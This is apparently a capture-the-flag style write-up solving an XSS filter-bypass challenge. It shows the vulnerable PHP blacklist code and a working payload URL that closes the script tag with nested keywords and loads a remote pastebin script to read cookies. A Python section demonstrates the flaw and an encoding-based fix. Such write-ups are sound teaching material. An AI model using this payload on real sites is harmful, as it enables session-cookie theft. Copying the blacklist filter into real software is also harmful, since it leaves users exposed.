XSS Bypass Challenge – 2 [Solutions]


As you know, XSS bypass challenges usually depend on knowledge of JavaScript, a good analysis of the web application's behaviour, and creativity. As with all my other challenges, this one was also a simulation of a real-life example that I experienced during a penetration test. We will have a look at the source code to understand what the developer tried to do to fix the XSS vulnerability and what he/she missed.

If you haven't tried to bypass the challenge yet, please try it yourself first; you can reach it directly via http://lab.mehmetince.net/h4ckm3/xss-2/index.php. Then you can come back here and continue reading the rest of the post.

First Things First

I want to share the names of those who successfully bypassed the challenge, together with their payloads.

Source Code

<html xmlns="http://www.w3.org/1999/html" lang="UTF-8">
<head>
    <META http-equiv=content-type content=text/html;charset=iso-8859-9>
    <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
    <script>
        $( document ).ready(function() {
            var LoadString = function(str){
                /* function body not preserved in the extracted page */
            };
            <?php
                setcookie('freedom_for', 'twitter!!!TURKIYE!');
                // escape quotes so the value cannot break out of the JS string below
                $foo = addslashes($_REQUEST['ali']);
                // blacklist ("zararli" = harmful); removed in a single str_replace pass
                $zararli = array('alert', 'confirm', 'write', 'img', 'svg', 'prompt','script');
                $foo = str_replace($zararli, '', strtolower($foo));
                echo "LoadString('".$foo."')";
            ?>
        });
    </script>
</head>
<body>
    <div style="text-align: center;">
        <h3>XSS - 2</h3>
        <h4>Target : alert document.cookie</h4>
        <h4>Please mention your solutions to @mmetince </h4>
        <div id="content">w8 input</div>
        <form action="index.php" method="GET">
            <input type="text" name="ali" placeholder="XSS payload.">
            <input type="submit" value="Gonder">
        </form>
    </div>
</body>
</html>

As you can see, there is something wrong with the PHP part of the source code. The first thing I want to mention is addslashes(). This function converts each single quote into backslash + single quote, which is the first part of preventing an XSS vulnerability inside the inline JavaScript string.


#Convert to

Secondly, the point I want to emphasise is about blacklisting specific HTML tags. If you really want to detect HTML tags inside user input, you have to be careful. In this example, the most common HTML tags are removed from the user input via str_replace. In order to bypass that security concept of the PHP code, we will focus on how str_replace is used. Please read the following code to understand the payload.

#Input - 1

#Output - 1

#Input - 2

#Output - 2


To be honest, I like @0x90kh4n's and @prakharprased's solutions. Actually, I used exactly the same payload as 0x90kh4n.

http://lab.mehmetince.net/h4ckm3/xss-2/index.php?ali=</scscriptript><scscriptript src=http://pastebin.com/raw.php?i=JVzVmtGJ></scriscriptpt>

As you can figure out, the first step is ending the JavaScript tag with </scscriptript> and reopening it via <scscriptript>. After that, call your remote JS file, which contains the alert(document.cookie) call. Then close your JavaScript tag with </scriscriptpt>. That's all.
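The weak point of the filter, as an added example that is not part of the original post: this Python re-implementation of the challenge's PHP filter (addslashes + strtolower + one pass of str_replace over the blacklist) shows how the nested tokens collapse back into a real </script>, and contrasts it with contextual encoding of the value for the JavaScript string context, which leaves the HTML parser nothing to close the script block with. The payload's remote URL is replaced by a constructed placeholder.

```python
import json
import re

# Constructed re-implementation of the challenge's PHP filter (not the page's
# own code): the $zararli blacklist applied after addslashes() and strtolower().
BLACKLIST = ['alert', 'confirm', 'write', 'img', 'svg', 'prompt', 'script']

# The page's payload shape, with a constructed placeholder URL.
PAYLOAD = "</scscriptript><scscriptript src=http://example.invalid/x.js></scriscriptpt>"

def addslashes(s: str) -> str:
    """Mimic PHP addslashes(): backslash-escape \\, ', " and NUL."""
    return (s.replace('\\', '\\\\').replace("'", "\\'")
             .replace('"', '\\"').replace('\x00', '\\0'))

def php_str_replace(search: list, replace: str, subject: str) -> str:
    """Mimic str_replace() with an array of search terms: one left-to-right
    pass per term, and text produced by a removal is never re-scanned."""
    for term in search:
        subject = subject.replace(term, replace)
    return subject

def challenge_filter(user_input: str) -> str:
    """The challenge's sanitiser: addslashes, lowercase, blacklist removal."""
    return php_str_replace(BLACKLIST, '', addslashes(user_input).lower())

def render_vulnerable(user_input: str) -> str:
    """What the PHP echo emits inside the <script> block."""
    return "LoadString('" + challenge_filter(user_input) + "')"

def render_hardened(user_input: str) -> str:
    """Encode for the JavaScript string context instead of blacklisting:
    JSON-encode the value and escape '</' as '<\\/', so the HTML parser never
    sees '</script' inside it. LoadString must still treat the value as text."""
    return "LoadString(" + json.dumps(user_input).replace('</', '<\\/') + ")"

def js_string_value(rendered: str) -> str:
    """Decode the argument back out of a render_hardened() result."""
    return json.loads(rendered[len("LoadString("):-1])

def closes_script_block(js: str) -> bool:
    """The HTML parser ends a <script> block on '</script' regardless of
    JavaScript quoting, so emitted JS must never contain it."""
    return re.search(r'</script', js, re.IGNORECASE) is not None
```

Running render_vulnerable(PAYLOAD) yields LoadString('</script><script src=http://example.invalid/x.js></script>'), while render_hardened(PAYLOAD) keeps the value intact but contains no closing script tag.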

In conclusion, I will prepare and post new online challenges based on what I experienced during penetration tests, again! Besides, the next challenge will be about SQL Injection.